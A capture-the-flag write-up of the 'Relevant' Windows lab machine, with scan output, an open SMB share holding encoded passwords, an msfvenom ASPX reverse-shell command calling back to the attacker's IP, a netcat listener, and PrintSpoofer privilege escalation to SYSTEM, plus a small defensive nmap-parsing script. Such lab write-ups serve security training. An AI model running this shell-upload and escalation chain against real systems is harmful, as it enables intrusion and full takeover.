Relevant
Overview

Scope of work
The client requests that an engineer conduct an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
- User.txt
- Root.txt
Additionally, the client has provided the following scope allowances:
- Any tools or techniques are permitted in this engagement; however, we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Submit the flags discovered to the dashboard
- Only the IP address assigned to your machine is in scope
- Find and report ALL vulnerabilities (yes, there is more than one path to root)
Recon
$ sudo nmap -A -sS -sV -T4 -oN relevant-nmap.txt 10.10.211.121
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-03 16:10 EDT
Nmap scan report for 10.10.211.121
Host is up (0.088s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2020-10-03T20:10:58+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after: 2021-01-23T23:16:08
|_ssl-date: 2020-10-03T20:11:39+00:00; +1s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2016 (90%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h24m01s, deviation: 3h07m50s, median: 1s
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-10-03T13:11:00-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-03T20:11:01
|_ start_date: 2020-10-03T19:59:51

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 12.78 ms 10.6.0.1
2 ... 3
4 98.42 ms 10.10.211.121

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.70 seconds
Highlights:
- IIS web server running on port 80
- Ports 139 and 445 indicate an SMB service that we may be able to exploit (note: message_signing: disabled (dangerous, but default))
- The operating system is likely Microsoft Windows Server 2012 R2 (92%) or Microsoft Windows Server 2016 (90%)
- IIS default website on port 80
- 3389/tcp open ms-wbt-server Microsoft Terminal Services (RDP - Remote desktop definitely seems very interesting)
- The OSScan warning and the 995 filtered ports suggest there may be more open ports that this default scan did not cover.
Let's kick off the threader3000 port scanner to do a full scan of all ports on the machine while we proceed with the next steps.
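To turn a scan like the one above into a findings list without reading it by eye, here is an added Python triage script (my own example, not part of this writeup or of nmap). It runs over a constructed excerpt of the -oN output shown above and flags the TRACE method, the exposed RDP service and the SMB signing state, which is what the highlights above call out.

```python
import re

# Constructed excerpt of the nmap -oN output shown above (not the full scan).
NMAP_OUTPUT = """\
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# Matches the "port/proto open service version" lines of nmap's normal output.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def parse_open_ports(text):
    """Return [(port, proto, service, version), ...] for every open port line."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4).strip()))
    return ports

def triage(text):
    """Turn the raw scan into a list of findings a reviewer would act on."""
    findings = []
    current_port = None
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            current_port = f"{m.group(1)}/{m.group(2)}"
            if m.group(3) == "ms-wbt-server":
                findings.append(f"{current_port}: RDP exposed; restrict to admin network")
            continue
        # NSE script lines belong to the most recently seen port.
        if "Potentially risky methods:" in line and current_port:
            methods = line.split(":", 1)[1].strip()
            findings.append(f"{current_port}: risky HTTP methods {methods}")
        if "message_signing: disabled" in line:
            findings.append("SMB1: message signing disabled (relay/tamper risk)")
        if "Message signing enabled but not required" in line:
            findings.append("SMB2: signing not required; set RequireSecuritySignature")
    return findings
```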
------------------------------------------------------------
 Threader 3000 - Multi-threaded Port Scanner
 Version 1.0.6
 A project by The Mayor
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.35.26
------------------------------------------------------------
Scanning target 10.10.35.26
Time started: 2020-10-06 21:31:44.429348
------------------------------------------------------------
Port 139 is open
Port 135 is open
Port 80 is open
Port 445 is open
Port 3389 is open
Port 49668 is open
Port 49663 is open
Port 49666 is open
Port scan completed in 0:01:39.226581
------------------------------------------------------------
This scan also finds ports 49663, 49666 and 49668; let's enumerate them further in the next step.
nmap -p139,135,80,445,3389,49668,49663,49666 -sV -sC -Pn -T4 10.10.199.210
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-06 22:20 EDT
Nmap scan report for 10.10.199.210
Host is up (0.081s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2020-10-07T02:21:10+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after: 2021-01-23T23:16:08
|_ssl-date: 2020-10-07T02:21:45+00:00; 0s from scanner time.
49663/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h24m01s, deviation: 3h07m52s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-10-06T19:21:10-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-07T02:21:09
|_ start_date: 2020-10-07T02:06:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.86 seconds
Looks like we have another web service running Microsoft IIS httpd 10.0, this time on port 49663. We need to kick off directory search tools to find paths that may be exposed. The landing pages for this port and for port 80 are the default IIS pages, so we need to dig deeper.
Enumeration
Kicked off gobuster in the background to enumerate paths.
# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.35.26:49666
$ smbclient //10.10.211.121/nt4wrksv
Enter WORKGROUP's password:
Try "help" to get a list of possible commands.
smb: \> ls
 . D 0 Sat Jul 25 17:46:04 2020
 .. D 0 Sat Jul 25 17:46:04 2020
 passwords.txt A 98 Sat Jul 25 11:15:33 2020

 7735807 blocks of size 4096. 5136451 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
$ cat passwords.txt
[User Passwords - Encoded]
Qm9XXXXXXXXXXXXXXXXXXXXXXXXX
QmlXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
These strings look base64 encoded; decode them with base64 -d:
$ echo -n Qm9XXXXXXXXXXXXXXXXXXXXX | base64 -d
BXXXXXXXXXXXXXXXXXX3
And:
$ echo -n QmlXXXXXXXXXXXXXXXXXXXXX | base64 -d
BXXXXXXXXXXXXXXXXX$
Now we have usernames and passwords to try against the system.
Exploit
Use the awesome venom builder tool on pentest.ws to quickly come up with a command to generate an ASPX reverse shell (see this link for pentesting tools).

# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.19.215 LPORT=8000 -f aspx -o shell.aspx
Copy the payload over to the SMB share.
# smbclient \\\\10.10.94.15\\nt4wrksv -U Bob
^C
root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/relevant/data# smbclient \\\\10.10.189.189\\nt4wrksv -U Bob
Enter WORKGROUP\Bob's password:
Try "help" to get a list of possible commands.
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (14.4 kb/s) (average 14.4 kb/s)
smb: \> ls
 . D 0 Sun Oct 4 13:05:44 2020
 .. D 0 Sun Oct 4 13:05:44 2020
 passwords.txt A 98 Sat Jul 25 11:15:33 2020
 shell.aspx A 3661 Sun Oct 4 13:05:44 2020

 7735807 blocks of size 4096. 5136965 blocks available
smb: \>
Post-Exploitation/Privesc
I also tried uploading an ASPX webshell. It was fun to capture the user flag from the webshell.

We also have our regular reverse shell:
# nc -nvlp 8000
listening on [any] 8000 ...
connect to [10.6.19.215] from (UNKNOWN) [10.10.199.210] 49945
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

c:\windows\system32\inetsrv>
From experience and reading around Windows privesc, I knew that SeImpersonatePrivilege is a juicy target that can be easily exploited, but I was stuck here for quite some time until I followed the Mayor's video on this box. Also learnt about a new privesc utility: https://github.com/itm4n/PrintSpoofer.
Uploaded the 64-bit version and ran it from the previously obtained shell; the rest was easy.
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
'PrintSpoofer.exe' is not recognized as an internal or external command,
operable program or batch file.

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of c:\Users\Administrator\Desktop

07/25/2020 08:24 AM <DIR> .
07/25/2020 08:24 AM <DIR> ..
07/25/2020 08:25 AM 35 root.txt
 1 File(s) 35 bytes
 2 Dir(s) 20,279,513,088 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
c:\Users\Administrator\Desktop>
This is a great box, and since there are several other ways to crack it, maybe I will do a follow-up attempt to hack into this machine using a different method.